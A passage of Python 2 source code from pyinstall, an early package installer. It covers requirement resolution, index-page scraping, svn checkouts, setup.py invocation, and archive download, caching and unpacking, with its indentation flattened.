# restart_in_venv should actually never return, but for clarity...
return
## FIXME: not sure if this sure come before or after venv restart
if options.log:
log_fp = open_logfile_append(options.log)
logger.consumers.append((logger.DEBUG, log_fp))
else:
log_fp = None
socket.setdefaulttimeout(options.timeout or None)
setup_proxy_handler(options.proxy)
if options.bundle:
if not options.build_dir:
options.build_dir = backup_dir(base_prefix, '-bundle')
if not options.src_dir:
options.src_dir = backup_dir(base_src_prefix, '-bundle')
# We have to get everything when creating a bundle:
options.ignore_installed = True
logger.notify('Putting temporary build files in %s and source/develop files in %s'
% (display_path(options.build_dir), display_path(options.src_dir)))
if not options.build_dir:
options.build_dir = base_prefix
if not options.src_dir:
options.src_dir = base_src_prefix
options.build_dir = os.path.abspath(options.build_dir)
options.src_dir = os.path.abspath(options.src_dir)
install_options = options.install_options or []
try:
if options.freeze:
if options.requirements:
if len(options.requirements) > 1:
raise InstallationError(
"When using --freeze you can only provide one --requirement option")
requirement = options.requirements[0]
else:
requirement = None
write_freeze(
options.freeze,
requirement=requirement,
find_links=options.find_links)
return
index_urls = [options.index_url] + options.extra_index_urls
finder = PackageFinder(
find_links=options.find_links,
index_urls=index_urls)
requirement_set = RequirementSet(build_dir=options.build_dir,
src_dir=options.src_dir,
upgrade=options.upgrade,
ignore_installed=options.ignore_installed)
for name in args:
requirement_set.add_requirement(
InstallRequirement.from_line(name, None))
for name in options.editables:
requirement_set.add_requirement(
InstallRequirement.from_editable(name))
for filename in options.requirements:
for req in parse_requirements(filename, finder=finder):
requirement_set.add_requirement(req)
exit = 0
requirement_set.install_files(finder)
if not options.no_install and not options.bundle:
requirement_set.install(install_options)
logger.notify('Successfully installed %s' % requirement_set)
elif options.bundle:
requirement_set.create_bundle(options.bundle)
logger.notify('Created bundle in %s' % options.bundle)
else:
logger.notify('Successfully downloaded %s' % requirement_set)
except InstallationError, e:
logger.fatal(str(e))
logger.info('Exception information:\n%s' % format_exc())
exit = 1
except:
logger.fatal('Exception:\n%s' % format_exc())
exit = 2
if log_fp is not None:
log_fp.close()
if exit:
log_fn = './pyinstall-log.txt'
text = '\n'.join(complete_log)
logger.fatal('Storing complete log in %s' % log_fn)
log_fp = open_logfile_append(log_fn)
log_fp.write(text)
log_fp.close()
sys.exit(exit)
def format_exc(exc_info=None):
if exc_info is None:
exc_info = sys.exc_info()
out = StringIO()
traceback.print_exception(*exc_info, **dict(file=out))
return out.getvalue()
def restart_in_venv(venv, args):
"""
Restart this script using the interpreter in the given virtual environment
"""
venv = os.path.abspath(venv)
if not os.path.exists(venv):
try:
import virtualenv
except ImportError:
print 'The virtual environment does not exist: %s' % venv
print 'and virtualenv is not installed, so a new environment cannot be created'
sys.exit(3)
print 'Creating new virtualenv environment in %s' % venv
virtualenv.logger = logger
logger.indent += 2
## FIXME: always have no_site_packages?
virtualenv.create_environment(venv, site_packages=False)
if sys.platform == 'win32':
python = os.path.join(venv, 'Scripts', 'python')
else:
python = os.path.join(venv, 'bin', 'python')
if not os.path.exists(python):
python = venv
if not os.path.exists(python):
raise BadCommand('Cannot find virtual environment interpreter at %s' % python)
base = os.path.dirname(os.path.dirname(python))
os.execv(python, [python, __file__] + args + [base, '___VENV_RESTART___'])
class PackageFinder(object):
"""This finds packages.
This is meant to match easy_install's technique for looking for
packages, by reading pages and looking for appropriate links
"""
failure_limit = 3
def __init__(self, find_links, index_urls):
self.find_links = find_links
self.index_urls = index_urls
self.dependency_links = []
self.cache = PageCache()
def add_dependency_links(self, links):
## FIXME: this shouldn't be global list this, it should only
## apply to requirements of the package that specifies the
## dependency_links value
## FIXME: also, we should track comes_from (i.e., use Link)
self.dependency_links.extend(links)
def find_requirement(self, req, upgrade):
url_name = req.url_name
# Check that we have the url_name correctly spelled:
main_index_url = Link(posixpath.join(self.index_urls[0], url_name))
# This will also cache the page, so it's okay that we get it again later:
page = self._get_page(main_index_url, req)
if page is None:
url_name = self._find_url_name(Link(self.index_urls[0]), url_name, req)
if url_name is not None:
locations = [
posixpath.join(url, url_name)
for url in self.index_urls] + self.find_links
else:
locations = list(self.find_links)
locations.extend(self.dependency_links)
for version in req.absolute_versions:
locations = [
posixpath.join(url, url_name, version)] + locations
locations = [Link(url) for url in locations]
logger.debug('URLs to search for versions for %s:' % req)
for location in locations:
logger.debug('* %s' % location)
found_versions = []
for page in self._get_pages(locations, req):
logger.debug('Analyzing links from page %s' % page.url)
logger.indent += 2
try:
found_versions.extend(self._package_versions(page.links, req.name.lower()))
finally:
logger.indent -= 2
dependency_versions = list(self._package_versions([Link(url) for url in self.dependency_links], req.name.lower()))
if dependency_versions:
logger.info('dependency_links found: %s' % ', '.join([link.url for parsed, link, version in dependency_versions]))
found_versions.extend(dependency_versions)
if not found_versions:
logger.fatal('Could not find any downloads that satisfy the requirement %s' % req)
raise DistributionNotFound('No distributions at all found for %s' % req)
if req.satisfied_by is not None:
found_versions.append((req.satisfied_by.parsed_version, Inf, req.satisfied_by.version))
found_versions.sort(reverse=True)
applicable_versions = []
for (parsed_version, link, version) in found_versions:
if version not in req.req:
logger.info("Ignoring link %s, version %s doesn't match %s"
% (link, version, ','.join([''.join(s) for s in req.req.specs])))
continue
applicable_versions.append((link, version))
existing_applicable = bool([link for link, version in applicable_versions if link is Inf])
if not upgrade and existing_applicable:
if applicable_versions[0][1] is Inf:
logger.info('Existing installed version (%s) is most up-to-date and satisfies requirement'
% req.satisfied_by.version)
else:
logger.info('Existing installed version (%s) satisfies requirement (most up-to-date version is %s)'
% (req.satisfied_by.version, application_versions[0][2]))
return None
if not applicable_versions:
logger.fatal('Could not find a version that satisfies the requirement %s (from versions: %s)'
% (req, ', '.join([version for parsed_version, link, version in found_versions])))
raise DistributionNotFound('No distributions matching the version for %s' % req)
if applicable_versions[0][0] is Inf:
# We have an existing version, and its the best version
logger.info('Installed version (%s) is most up-to-date (past versions: %s)'
% (req.satisfied_by.version, ', '.join([version for link, version in applicable_versions[1:]]) or 'none'))
return None
if len(applicable_versions) > 1:
logger.info('Using version %s (newest of versions: %s)' %
(applicable_versions[0][1], ', '.join([version for link, version in applicable_versions])))
return applicable_versions[0][0]
def _find_url_name(self, index_url, url_name, req):
"""Finds the true URL name of a package, when the given name isn't quite correct.
This is usually used to implement case-insensitivity."""
if not index_url.url.endswith('/'):
# Vaguely part of the PyPI API... weird but true.
## FIXME: bad to modify this?
index_url.url += '/'
page = self._get_page(index_url, req)
if page is None:
logger.fatal('Cannot fetch index base URL %s' % index_url)
raise DistributionNotFound('Cannot find requirement %s, nor fetch index URL %s' % (req, index_url))
norm_name = normalize_name(req.url_name)
for link in page.links:
base = posixpath.basename(link.path.rstrip('/'))
if norm_name == normalize_name(base):
logger.notify('Real name of requirement %s is %s' % (url_name, base))
return base
return None
def _get_pages(self, locations, req):
"""Yields (page, page_url) from the given locations, skipping
locations that have errors, and adding download/homepage links"""
pending_queue = Queue()
for location in locations:
pending_queue.put(location)
done = []
seen = set()
threads = []
for i in range(min(10, len(locations))):
t = threading.Thread(target=self._get_queued_page, args=(req, pending_queue, done, seen))
t.setDaemon(True)
threads.append(t)
t.start()
for t in threads:
t.join()
return done
_log_lock = threading.Lock()
def _get_queued_page(self, req, pending_queue, done, seen):
while 1:
try:
location = pending_queue.get(False)
except QueueEmpty:
return
if location in seen:
continue
seen.add(location)
page = self._get_page(location, req)
if page is None:
continue
done.append(page)
for link in page.rel_links():
pending_queue.put(link)
_egg_fragment_re = re.compile(r'#egg=([^&]*)')
_egg_info_re = re.compile(r'([a-z0-9_.]+)-([a-z0-9_.-]+)', re.I)
_py_version_re = re.compile(r'-py([123]\.[0-9])$')
def _package_versions(self, links, search_name):
seen_links = {}
for link in links:
if link.url in seen_links:
continue
seen_links[link.url] = None
if link.egg_fragment:
egg_info = link.egg_fragment
else:
path = link.path
egg_info, ext = link.splitext()
if not ext:
logger.debug('Skipping link %s; not a file' % link)
continue
if egg_info.endswith('.tar'):
# Special double-extension case:
egg_info = egg_info[:-4]
ext = '.tar' + ext
if ext not in ('.tar.gz', '.tar.bz2', '.tar', '.tgz', '.zip'):
logger.debug('Skipping link %s; unknown archive format: %s' % (link, ext))
continue
version = self._egg_info_matches(egg_info, search_name, link)
if version is None:
logger.debug('Skipping link %s; wrong project name (not %s)' % (link, search_name))
continue
match = self._py_version_re.search(version)
if match:
version = version[:match.start()]
py_version = match.group(1)
if py_version != sys.version[:3]:
logger.debug('Skipping %s because Python version is incorrect' % link)
continue
logger.debug('Found link %s, version: %s' % (link, version))
yield (pkg_resources.parse_version(version),
link,
version)
def _egg_info_matches(self, egg_info, search_name, link):
match = self._egg_info_re.search(egg_info)
if not match:
logger.debug('Could not parse version from link: %s' % link)
return None
name = match.group(0).lower()
# To match the "safe" name that pkg_resources creates:
name = name.replace('_', '-')
if name.startswith(search_name.lower()):
return match.group(0)[len(search_name):].lstrip('-')
else:
return None
def _get_page(self, link, req):
return HTMLPage.get_page(link, req, cache=self.cache)
class InstallRequirement(object):
def __init__(self, req, comes_from, source_dir=None, editable=False,
url=None, update=True):
if isinstance(req, basestring):
req = pkg_resources.Requirement.parse(req)
self.req = req
self.comes_from = comes_from
self.source_dir = source_dir
self.editable = editable
if editable:
assert url, "You must give url with editable=True"
self.url = url
self._egg_info_path = None
# This holds the pkg_resources.Distribution object if this requirement
# is already available:
self.satisfied_by = None
self._temp_build_dir = None
self._is_bundle = None
# True if the editable should be updated:
self.update = update
@classmethod
def from_editable(cls, editable_req, comes_from=None):
name, url = parse_editable(editable_req)
return cls(name, comes_from, editable=True, url=url)
@classmethod
def from_line(cls, name, comes_from=None):
"""Creates an InstallRequirement from a name, which might be a
requirement, filename, or URL.
"""
url = None
req = name
if is_url(name):
url = name
## FIXME: I think getting the requirement here is a bad idea:
#req = get_requirement_from_url(url)
req = None
elif is_filename(name):
if not os.path.exists(name):
logger.warn('Requirement %r looks like a filename, but the file does not exist'
% name)
url = filename_to_url(name)
#req = get_requirement_from_url(url)
req = None
return cls(req, comes_from, url=url)
def __str__(self):
if self.req:
s = str(self.req)
if self.url:
s += ' from %s' % self.url
else:
s = self.url
if self.satisfied_by is not None:
s += ' in %s' % display_path(self.satisfied_by.location)
if self.editable:
if self.req:
s += ' checkout from %s' % self.url
if self.comes_from:
if isinstance(self.comes_from, basestring):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
s += ' (from %s)' % comes_from
return s
def from_path(self):
s = str(self.req)
if self.comes_from:
if isinstance(self.comes_from, basestring):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
s += '->' + comes_from
return s
def build_location(self, build_dir):
if self._temp_build_dir is not None:
return self._temp_build_dir
if self.req is None:
self._temp_build_dir = tempfile.mkdtemp('-build', 'pyinstall-')
return self._temp_build_dir
if self.editable:
name = self.name.lower()
else:
name = self.name
return os.path.join(build_dir, name)
@property
def name(self):
if self.req is None:
return None
return self.req.project_name
@property
def url_name(self):
if self.req is None:
return None
return urllib.quote(self.req.unsafe_name)
@property
def setup_py(self):
return os.path.join(self.source_dir, 'setup.py')
def run_egg_info(self):
assert self.source_dir
if self.name:
logger.notify('Running setup.py egg_info for package %s' % self.name)
else:
logger.notify('Running setup.py egg_info for package from %s' % self.url)
logger.indent += 2
try:
script = self._run_setup_py
script = script.replace('__SETUP_PY__', repr(self.setup_py))
script = script.replace('__PKG_NAME__', repr(self.name))
# We can't put the .egg-info files at the root, because then the source code will be mistaken
# for an installed egg, causing problems
if self.editable:
egg_base_option = []
else:
egg_info_dir = os.path.join(self.source_dir, 'pyinstall-egg-info')
if not os.path.exists(egg_info_dir):
os.makedirs(egg_info_dir)
egg_base_option = ['--egg-base', 'pyinstall-egg-info']
call_subprocess(
[sys.executable, '-c', script, 'egg_info'] + egg_base_option,
cwd=self.source_dir, filter_stdout=self._filter_install, show_stdout=False,
command_level=Logger.VERBOSE_DEBUG,
command_desc='python setup.py egg_info')
finally:
logger.indent -= 2
if not self.req:
self.req = pkg_resources.Requirement.parse(self.pkg_info()['Name'])
## FIXME: This is a lame hack, entirely for PasteScript which has
## a self-provided entry point that causes this awkwardness
_run_setup_py = """
__file__ = __SETUP_PY__
from setuptools.command import egg_info
def replacement_run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in egg_info.iter_entry_points('egg_info.writers'):
# require=False is the change we're making:
writer = ep.load(require=False)
writer(self, ep.name, egg_info.os.path.join(self.egg_info,ep.name))
self.find_sources()
egg_info.egg_info.run = replacement_run
execfile(__file__)
"""
def egg_info_data(self, filename):
if self.satisfied_by is not None:
if not self.satisfied_by.has_metadata(filename):
return None
return self.satisfied_by.get_metadata(filename)
assert self.source_dir
filename = self.egg_info_path(filename)
if not os.path.exists(filename):
return None
fp = open(filename, 'r')
data = fp.read()
fp.close()
return data
def egg_info_path(self, filename):
if self._egg_info_path is None:
if self.editable:
base = self.source_dir
else:
base = os.path.join(self.source_dir, 'pyinstall-egg-info')
filenames = os.listdir(base)
if self.editable:
filenames = [f for f in filenames if f.endswith('.egg-info')]
assert len(filenames) == 1, "Unexpected files/directories in %s: %s" % (base, ' '.join(filenames))
self._egg_info_path = os.path.join(base, filenames[0])
return os.path.join(self._egg_info_path, filename)
def egg_info_lines(self, filename):
data = self.egg_info_data(filename)
if not data:
return []
result = []
for line in data.splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
result.append(line)
return result
def pkg_info(self):
p = FeedParser()
data = self.egg_info_data('PKG-INFO')
if not data:
logger.warn('No PKG-INFO file found in %s' % display_path(self.egg_info_path('PKG-INFO')))
p.feed(data or '')
return p.close()
@property
def dependency_links(self):
return self.egg_info_lines('dependency_links.txt')
_requirements_section_re = re.compile(r'\[(.*?)\]')
def requirements(self, extras=()):
in_extra = None
for line in self.egg_info_lines('requires.txt'):
match = self._requirements_section_re.match(line)
if match:
in_extra = match.group(1)
continue
if in_extra and in_extra not in extras:
# Skip requirement for an extra we aren't requiring
continue
yield line
@property
def absolute_versions(self):
for qualifier, version in self.req.specs:
if qualifier == '==':
yield version
@property
def installed_version(self):
return self.pkg_info()['version']
def assert_source_matches_version(self):
assert self.source_dir
if self.comes_from == 'command line':
# We don't check the versions of things explicitly installed.
# This makes, e.g., "pyinstall Package==dev" possible
return
version = self.installed_version
if version not in self.req:
logger.fatal(
'Source in %s has the version %s, which does not match the requirement %s'
% (display_path(self.source_dir), version, self))
raise InstallationError(
'Source in %s has version %s that conflicts with %s'
% (display_path(self.source_dir), version, self))
else:
logger.debug('Source in %s has version %s, which satisfies requirement %s'
% (display_path(self.source_dir), version, self))
def update_editable(self):
assert self.editable and self.url
assert self.source_dir
assert '+' in self.url, "bad url: %r" % self.url
if not self.update:
return
vc_type, url = self.url.split('+', 1)
vc_type = vc_type.lower()
if vc_type == 'svn':
self.checkout_svn()
else:
assert 0, (
'Unexpected version control type (in %s): %s'
% (self.url, vc_type))
def checkout_svn(self):
url = self.url.split('+', 1)[1]
url = url.split('#', 1)[0]
if '@' in url:
url, rev = url.split('@', 1)
else:
rev = None
if rev:
rev_options = ['-r', rev]
rev_display = ' (to revision %s)' % rev
else:
rev_options = []
rev_display = ''
dest = self.source_dir
checkout = True
if os.path.exists(os.path.join(self.source_dir, '.svn')):
existing_url = _get_svn_info(self.source_dir)[0]
checkout = False
if existing_url == url:
logger.info('Checkout in %s exists, and has correct URL (%s)'
% (display_path(self.source_dir), url))
logger.notify('Updating checkout %s%s' % (display_path(self.source_dir), rev_display))
call_subprocess(
['svn', 'update'] + rev_options + [self.source_dir])
else:
logger.warn('svn checkout in %s exists with URL %s' % (display_path(self.source_dir), existing_url))
logger.warn('The plan is to install the svn repository %s' % url)
response = ask('What to do? (s)witch, (i)gnore, (w)ipe, (b)ackup', ('s', 'i', 'w', 'b'))
if response == 's':
logger.notify('Switching checkout %s to %s%s'
% (display_path(self.source_dir), url, rev_display))
call_subprocess(
['svn', 'switch'] + rev_options + [url, self.source_dir])
elif response == 'i':
# do nothing
pass
elif response == 'w':
logger.warn('Deleting %s' % display_path(self.source_dir))
shutil.rmtree(self.source_dir)
checkout = True
elif response == 'b':
dest_dir = backup_dir(self.source_dir)
logger.warn('Backing up %s to %s' % display_path(self.source_dir, dest_dir))
shutil.move(self.source_dir, dest_dir)
checkout = True
if checkout:
logger.notify('Checking out %s%s to %s' % (url, rev_display, display_path(self.source_dir)))
call_subprocess(
['svn', 'checkout', '-q'] + rev_options + [url, self.source_dir])
def install(self, install_options):
if self.editable:
self.install_editable()
return
## FIXME: this is not a useful record:
## Also a bad location
## And not right on Windows
install_location = os.path.join(sys.prefix, 'lib', 'python%s' % sys.version[:3])
record_filename = os.path.join(install_location, 'install-record-%s.txt' % self.name)
## FIXME: I'm not sure if this is a reasonable location; probably not
## but we can't put it in the default location, as that is a virtualenv symlink that isn't writable
header_dir = os.path.join(os.path.dirname(os.path.dirname(self.source_dir)), 'lib', 'include')
logger.notify('Running setup.py install for %s' % self.name)
logger.indent += 2
try:
call_subprocess(
[sys.executable, '-c',
"import setuptools; __file__=%r; execfile(%r)" % (self.setup_py, self.setup_py),
'install', '--single-version-externally-managed', '--record', record_filename,
'--install-headers', header_dir] + install_options,
cwd=self.source_dir, filter_stdout=self._filter_install, show_stdout=False)
finally:
logger.indent -= 2
def remove_temporary_source(self):
"""Remove the source files from this requirement, if they are marked
for deletion"""
if self.is_bundle or os.path.exists(self.delete_marker_filename):
logger.info('Removing source in %s' % self.source_dir)
if self.source_dir:
shutil.rmtree(self.source_dir)
self.source_dir = None
if self._temp_build_dir and os.path.exists(self._temp_build_dir):
shutil.rmtree(self._temp_build_dir)
self._temp_build_dir = None
def install_editable(self):
logger.notify('Running setup.py develop for %s' % self.name)
logger.indent += 2
try:
## FIXME: should we do --install-headers here too?
call_subprocess(
[sys.executable, '-c',
"import setuptools; __file__=%r; execfile(%r)" % (self.setup_py, self.setup_py),
'develop', '--no-deps'], cwd=self.source_dir, filter_stdout=self._filter_install,
show_stdout=False)
finally:
logger.indent -= 2
def _filter_install(self, line):
level = Logger.NOTIFY
for regex in [r'^running .*', r'^writing .*', '^creating .*', '^[Cc]opying .*',
r'^reading .*', r"^removing .*\.egg-info' \(and everything under it\)$",
r'^byte-compiling ',
# Not sure what this warning is, but it seems harmless:
r"^warning: manifest_maker: standard file '-c' not found$"]:
if re.search(regex, line.strip()):
level = Logger.INFO
break
return (level, line)
def check_if_exists(self):
"""Checks if this requirement is satisfied by something already installed"""
if self.req is None:
return False
try:
dist = pkg_resources.get_distribution(self.req)
except pkg_resources.DistributionNotFound:
return False
self.satisfied_by = dist
return True
@property
def is_bundle(self):
if self._is_bundle is not None:
return self._is_bundle
base = self._temp_build_dir
if not base:
## FIXME: this doesn't seem right:
return False
self._is_bundle = os.path.exists(os.path.join(base, 'pyinstall-manifest.txt'))
return self._is_bundle
def bundle_requirements(self):
base = self._temp_build_dir
assert base
src_dir = os.path.join(base, 'src')
build_dir = os.path.join(base, 'build')
if os.path.exists(src_dir):
for package in os.listdir(src_dir):
## FIXME: svnism:
url = 'svn+' + _get_svn_info(os.path.join(src_dir, package))[0]
yield InstallRequirement(
package, self, editable=True, url=url,
update=False)
if os.path.exists(build_dir):
for package in os.listdir(build_dir):
yield InstallRequirement(
package, self)
def move_bundle_files(self, dest_build_dir, dest_src_dir):
base = self._temp_build_dir
assert base
src_dir = os.path.join(base, 'src')
build_dir = os.path.join(base, 'build')
for source_dir, dest_dir in [(src_dir, dest_src_dir),
(build_dir, dest_build_dir)]:
if os.path.exists(source_dir):
for dirname in os.listdir(source_dir):
dest = os.path.join(dest_dir, dirname)
if os.path.exists(dest):
logger.warn('The directory %s (containing package %s) already exists; cannot move source from bundle %s'
% (dest, dirname, self))
continue
if not os.path.exists(dest_dir):
logger.info('Creating directory %s' % dest_dir)
os.makedirs(dest_dir)
shutil.move(os.path.join(source_dir, dirname), dest)
@property
def delete_marker_filename(self):
assert self.source_dir
return os.path.join(self.source_dir, 'pyinstall-delete-this-directory.txt')
DELETE_MARKER_MESSAGE = '''\
This file is placed here by pyinstall to indicate the source was put
here by pyinstall.
Once this package is successfully installed this source code will be
deleted (unless you remove this file).
'''
class RequirementSet(object):
def __init__(self, build_dir, src_dir, upgrade=False, ignore_installed=False):
self.build_dir = build_dir
self.src_dir = src_dir
self.upgrade = upgrade
self.ignore_installed = ignore_installed
self.requirements = {}
# Mapping of alias: real_name
self.requirement_aliases = {}
self.unnamed_requirements = []
def __str__(self):
reqs = [req for req in self.requirements.values()
if not req.comes_from]
reqs.sort(key=lambda req: req.name.lower())
return ' '.join([str(req.req) for req in reqs])
def add_requirement(self, install_req):
name = install_req.name
if not name:
self.unnamed_requirements.append(install_req)
else:
if self.has_requirement(name):
raise InstallationError(
'Double requirement given: %s (aready in %s, name=%r)'
% (install_req, self.get_requirement(name), name))
self.requirements[name] = install_req
## FIXME: what about other normalizations? E.g., _ vs. -?
if name.lower() != name:
self.requirement_aliases[name.lower()] = name
def has_requirement(self, project_name):
for name in project_name, project_name.lower():
if name in self.requirements or name in self.requirement_aliases:
return True
return False
def get_requirement(self, project_name):
for name in project_name, project_name.lower():
if name in self.requirements:
return self.requirements[name]
if name in self.requirement_aliases:
return self.requirements[self.requirement_aliases[name]]
raise KeyError("No project with the name %r" % project_name)
def install_files(self, finder):
unnamed = list(self.unnamed_requirements)
reqs = self.requirements.values()
while reqs or unnamed:
if unnamed:
req_to_install = unnamed.pop(0)
else:
req_to_install = reqs.pop(0)
install = True
if not self.ignore_installed and not req_to_install.editable:
if req_to_install.check_if_exists():
if not self.upgrade:
# If we are upgrading, we still need to check the version
install = False
if req_to_install.satisfied_by is not None:
logger.notify('Requirement already satisfied: %s' % req_to_install)
elif req_to_install.editable:
logger.notify('Checking out %s' % req_to_install)
else:
if req_to_install.url and req_to_install.url.lower().startswith('file:'):
logger.notify('Unpacking %s' % display_path(url_to_filename(req_to_install.url)))
else:
logger.notify('Downloading/unpacking %s' % req_to_install)
logger.indent += 2
is_bundle = False
try:
if req_to_install.editable:
location = req_to_install.build_location(self.src_dir)
req_to_install.source_dir = location
req_to_install.update_editable()
req_to_install.run_egg_info()
elif install:
location = req_to_install.build_location(self.build_dir)
## FIXME: is the existance of the checkout good enough to use it? I'm don't think so.
unpack = True
if not os.path.exists(os.path.join(location, 'setup.py')):
## FIXME: this won't upgrade when there's an existing package unpacked in `location`
if req_to_install.url is None:
url = finder.find_requirement(req_to_install, upgrade=self.upgrade)
else:
## FIXME: should req_to_install.url already be a link?
url = Link(req_to_install.url)
assert url
if url:
try:
self.unpack_url(url, location)
except urllib2.HTTPError, e:
logger.fatal('Could not install requirement %s because of error %s'
% (req_to_install, e))
raise InstallationError(
'Could not install requirement %s because of HTTP error %s for URL %s'
% (req_to_install, e, url))
else:
unpack = False
if unpack:
is_bundle = req_to_install.is_bundle
if is_bundle:
for subreq in req_to_install.bundle_requirements():
reqs.append(subreq)
self.add_requirement(subreq)
req_to_install.move_bundle_files(self.build_dir, self.src_dir)
else:
req_to_install.source_dir = location
req_to_install.run_egg_info()
req_to_install.assert_source_matches_version()
f = open(req_to_install.delete_marker_filename, 'w')
f.write(DELETE_MARKER_MESSAGE)
f.close()
if not is_bundle:
## FIXME: shouldn't be globally added:
finder.add_dependency_links(req_to_install.dependency_links)
## FIXME: add extras in here:
for req in req_to_install.requirements():
try:
name = pkg_resources.Requirement.parse(req).project_name
except ValueError, e:
## FIXME: proper warning
logger.error('Invalid requirement: %r (%s) in requirement %s' % (req, e, req_to_install))
continue
if self.has_requirement(name):
## FIXME: check for conflict
continue
subreq = InstallRequirement(req, req_to_install)
reqs.append(subreq)
self.add_requirement(subreq)
if req_to_install.name not in self.requirements:
self.requirements[req_to_install.name] = req_to_install
else:
req_to_install.remove_temporary_source()
finally:
logger.indent -= 2
def unpack_url(self, link, location):
if link.scheme == 'svn' or link.scheme == 'svn+ssh':
self.svn_checkout(link, location)
return
dir = tempfile.mkdtemp()
if link.url.lower().startswith('file:'):
source = url_to_filename(link.url)
content_type = mimetypes.guess_type(source)
self.unpack_file(source, location, content_type, link)
return
md5_hash = link.md5_hash
target_url = link.url.split('#', 1)[0]
target_file = None
if os.environ.get('PYINSTALL_DOWNLOAD_CACHE'):
target_file = os.path.join(os.environ['PYINSTALL_DOWNLOAD_CACHE'],
urllib.quote(target_url, ''))
if (target_file and os.path.exists(target_file)
and os.path.exists(target_file+'.content-type')):
fp = open(target_file+'.content-type')
content_type = fp.read().strip()
fp.close()
if md5_hash:
download_hash = md5()
fp = open(target_file, 'rb')
while 1:
chunk = fp.read(4096)
if not chunk:
break
download_hash.update(chunk)
fp.close()
temp_location = target_file
logger.notify('Using download cache from %s' % target_file)
else:
try:
resp = urllib2.urlopen(target_url)
except urllib2.HTTPError, e:
logger.fatal("HTTP error %s while getting %s" % (e.code, link))
raise
except IOError, e:
# Typically an FTP error
logger.fatal("Error %s while getting %s" % (e, link))
raise
content_type = resp.info()['content-type']
filename = link.filename
ext = splitext(filename)
if not ext:
ext = mimetypes.guess_extension(content_type)
filename += ext
temp_location = os.path.join(dir, filename)
fp = open(temp_location, 'wb')
if md5_hash:
download_hash = md5()
try:
total_length = int(resp.info()['content-length'])
except (ValueError, KeyError):
total_length = 0
downloaded = 0
show_progress = total_length > 40*1000 or not total_length
show_url = link.show_url
try:
if show_progress:
## FIXME: the URL can get really long in this message:
if total_length:
logger.start_progress('Downloading %s (%s): ' % (show_url, format_size(total_length)))
else:
logger.start_progress('Downloading %s (unknown size): ' % show_url)
else:
logger.notify('Downloading %s' % show_url)
logger.debug('Downloading from URL %s' % link)
while 1:
chunk = resp.read(4096)
if not chunk:
break
downloaded += len(chunk)
if show_progress:
if not total_length:
logger.show_progress('%s' % format_size(downloaded))
else:
logger.show_progress('%3i%% %s' % (100*downloaded/total_length, format_size(downloaded)))
if md5_hash:
download_hash.update(chunk)
fp.write(chunk)
fp.close()
finally:
if show_progress:
logger.end_progress('%s downloaded' % format_size(downloaded))
if md5_hash:
download_hash = download_hash.hexdigest()
if download_hash != md5_hash:
logger.fatal("MD5 hash of the package %s (%s) doesn't match the expected hash %s!"
% (link, download_hash, md5_hash))
raise InstallationError('Bad MD5 hash for package %s' % link)
self.unpack_file(temp_location, location, content_type, link)
if target_file and target_file != temp_location:
logger.notify('Storing download in cache at %s' % display_path(target_file))
shutil.copyfile(temp_location, target_file)
fp = open(target_file+'.content-type', 'w')
fp.write(content_type)
fp.close()
os.unlink(temp_location)
def unpack_file(self, filename, location, content_type, link):
if (content_type == 'application/zip'
or filename.endswith('.zip')
or filename.endswith('.pybundle')):
self.unzip_file(filename, location, flatten=not filename.endswith('.pybundle'))
elif (content_type == 'application/x-gzip'
or tarfile.is_tarfile(filename)
or splitext(filename)[1].lower() in ('.tar', '.tar.gz', '.tar.bz2', '.tgz')):
self.untar_file(filename, location)
elif (content_type.startswith('text/html')
and is_svn_page(file_contents(filename))):
# We don't really care about this
self.svn_checkout(link.url, location)
else:
## FIXME: handle?
## FIXME: magic signatures?
logger.fatal('Cannot unpack file %s (downloaded from %s, content-type: %s); cannot detect archive format'
% (filename, location, content_type))
raise InstallationError('Cannot determine archive format of %s' % location)
def unzip_file(self, filename, location, flatten=True):
"""Unzip the file (zip file located at filename) to the destination
location"""
if not os.path.exists(location):
os.makedirs(location)
zipfp = open(filename, 'rb')
try:
zip = zipfile.ZipFile(zipfp)
leading = has_leading_dir(zip.namelist()) and flatten
for name in zip.namelist():
data = zip.read(name)
fn = name
if leading:
fn = split_leading_dir(name)[1]
fn = os.path.join(location, fn)
dir = os.path.dirname(fn)
if not os.path.exists(dir):
os.makedirs(dir)
if fn.endswith('/'):
# A directory
if not os.path.exists(fn):
os.makedirs(fn)
else:
fp = open(fn, 'wb')
try:
fp.write(data)
finally:
fp.close()
finally:
zipfp.close()
def untar_file(self, filename, location):
"""Untar the file (tar file located at filename) to the destination location"""
if not os.path.exists(location):
os.makedirs(location)
if filename.lower().endswith('.gz') or filename.lower().endswith('.tgz'):
mode = 'r:gz'
elif filename.lower().endswith('.bz2'):
mode = 'r:bz2'
elif filename.lower().endswith('.tar'):
mode = 'r'
else:
logger.warn('Cannot determine compression type for file %s' % filename)
mode = 'r:*'
tar = tarfile.open(filename, mode)
try:
leading = has_leading_dir([member.name for member in tar.getmembers()])
for member in tar.getmembers():
fn = member.name
if leading:
fn = split_leading_dir(fn)[1]
path = os.path.join(location, fn)
if member.isdir():
if not os.path.exists(path):
os.makedirs(path)
else:
fp = tar.extractfile(member)
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
destfp = open(path, 'wb')
try:
shutil.copyfileobj(fp, destfp)
finally:
destfp.close()
fp.close()
finally:
tar.close()
def svn_checkout(self, url, location):
"""Check out the svn repository at the url to the destination location"""
if '#' in url:
url = url.split('#', 1)[0]
logger.notify('Checking out svn repository %s to %s' % (url, location))
logger.indent += 2
try:
## FIXME: not sure that --force is good, but it is needed
## when installing directly (not via a requirement),
## because the destination directory already exists.
call_subprocess(['svn', 'checkout', '--force', url, location],
filter_stdout=self._filter_svn, show_stdout=False)
finally:
logger.indent -= 2
def _filter_svn(self, line):
return (Logger.INFO, line)
def install(self, install_options):
"""Install everything in this set (after having downloaded and unpacked the packages)"""
requirements = sorted(self.requirements.values(), key=lambda p: p.name.lower())
logger.notify('Installing collected packages: %s' % (', '.join([req.name for req in requirements])))
logger.indent += 2
try:
for requirement in self.requirements.values():
if requirement.satisfied_by is not None:
# Already installed
continue
requirement.install(install_options)
requirement.remove_temporary_source()
finally:
logger.indent -= 2
def create_bundle(self, bundle_filename):
## FIXME: can't decide which is better; zip is easier to read
## random files from, but tar.bz2 is smaller and not as lame a
## format.
## FIXME: this file should really include a manifest of the
## packages, maybe some other metadata files. It would make
## it easier to detect as well.
